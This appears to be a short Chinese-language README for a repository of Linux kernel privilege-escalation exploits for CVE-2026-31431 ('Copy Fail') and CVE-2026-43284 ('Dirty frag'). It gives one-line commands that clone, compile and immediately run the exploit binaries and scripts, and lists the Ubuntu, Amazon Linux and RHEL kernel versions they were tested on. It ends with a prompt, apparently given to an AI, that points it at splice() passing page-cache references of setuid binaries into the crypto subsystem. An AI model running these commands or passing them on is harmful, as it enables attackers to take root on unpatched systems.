远程
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && cd Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284 && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && cd Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284 && python copy-fail-CVE-2026-31431.py
本地
gcc -O0 -Wall -o exp exp.c -lutil && ./exp
python copy-fail-CVE-2026-31431.py
Dirty-frag-CVE-2026-43284
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Copy-Fail-CVE-2026-31431
技术文章
已测试的发行版 / 版本
| 发行版 | 版本 |
|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
提示词
这是 Linux crypto/ 子系统。请检查从用户空间系统调用可到达的所有代码路径。请注意一个关键观察:splice() 可以将只读文件(包括 setuid 二进制文件)的 page-cache 引用传递给 crypto TX scatterlist。
https://github.com/user-attachments/assets/039ae419-28dc-41d2-bda5-83cd4b9c88ac